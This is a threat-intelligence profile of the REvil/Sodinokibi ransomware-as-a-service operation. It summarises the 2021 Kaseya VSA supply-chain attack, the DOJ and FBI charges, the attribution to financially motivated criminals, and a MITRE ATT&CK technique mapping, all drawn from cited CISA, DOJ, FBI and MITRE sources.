REvil / Sodinokibi

Executive Summary

REvil, also known as Sodinokibi, is a ransomware-as-a-service and extortion operation tracked by MITRE ATT&CK as GOLD SOUTHFIELD. MITRE describes GOLD SOUTHFIELD as a financially motivated threat group that operates REvil ransomware-as-a-service and provides backend infrastructure for affiliates recruited on underground forums.

The operation is associated with ransomware deployment, data-theft extortion, and affiliate-driven intrusions. DOJ and FBI public records identify Sodinokibi/REvil affiliates and alleged operators, including charges and seizure actions announced in November 2021. Those public records support cybercriminal attribution but do not establish state sponsorship for the operation.

Notable Campaigns

The July 2021 Kaseya VSA supply-chain incident is the principal campaign documented in the cited public sources. CISA: Kaseya VSA Supply-Chain Ransomware Attack stated that CISA was responding to a supply-chain ransomware attack against Kaseya VSA and multiple managed service providers using VSA software. CISA urged affected organizations to review Kaseya guidance and shut down VSA servers.

U.S. Department of Justice: Ukrainian Arrested and Charged with Ransomware Attack on Kaseya later announced charges against Yaroslav Vasinskyi for alleged ransomware attacks including the July 2021 Kaseya attack. DOJ stated that the Kaseya attack involved malicious Sodinokibi/REvil code deployed through a Kaseya product to endpoints on customer networks.

Technical Capabilities

MITRE ATT&CK reports that GOLD SOUTHFIELD used multiple initial-access paths, including exploitation of public-facing applications, malicious spam, external remote services, managed service provider relationships, and software supply-chain compromise. MITRE also reports use of ConnectWise Control to deploy REvil and staging or execution of PowerShell scripts on compromised hosts.

DOJ described Sodinokibi/REvil deployments in which defendants allegedly accessed victim networks, deployed ransomware, encrypted victim computers, and left ransom notes directing victims to Tor or web addresses for payment instructions. DOJ and FBI sources also describe data-theft pressure in which nonpayment could result in stolen data being posted or claimed to be sold.

Attribution

Public sources support attribution to a financially motivated cybercriminal ransomware ecosystem. MITRE tracks the associated group as GOLD SOUTHFIELD and lists Pinchy Spider as an associated public name. FBI described Yevgeniy Igorevich Polyanin as one of many Sodinokibi/REvil ransomware affiliates and stated that he is believed to be in Russia, possibly Barnaul.

DOJ and FBI records identify named individuals as alleged affiliates or operators in specific cases. The cited public sources do not establish that the entire REvil/Sodinokibi operation was directed by a state intelligence service.

MITRE ATT&CK Profile

T1190 - Exploit Public-Facing Application: MITRE reports GOLD SOUTHFIELD exploitation of public-facing applications, including Oracle WebLogic vulnerabilities, for initial compromise.

T1195.002 - Compromise Software Supply Chain: MITRE reports GOLD SOUTHFIELD distribution of ransomware through compromised software supply-chain paths.

T1199 - Trusted Relationship: MITRE reports GOLD SOUTHFIELD compromise of managed service providers to deliver malware to downstream customers.

T1219 - Remote Access Tools: MITRE reports GOLD SOUTHFIELD use of ConnectWise Control to deploy REvil.

T1059.001 - PowerShell: MITRE reports GOLD SOUTHFIELD staging and execution of PowerShell scripts on compromised hosts.

T1486 - Data Encrypted for Impact: DOJ described Sodinokibi/REvil ransomware deployments that encrypted victim computers.

Sources & References

• CISA: Kaseya VSA Supply-Chain Ransomware Attack — CISA, 2021-07-02
• U.S. Department of Justice: Ukrainian Arrested and Charged with Ransomware Attack on Kaseya — U.S. Department of Justice, 2021-11-08
• FBI: Yevgeniy Igorevich Polyanin — FBI, 2021-11-04
• MITRE ATT&CK: GOLD SOUTHFIELD — MITRE ATT&CK, 2025-04-16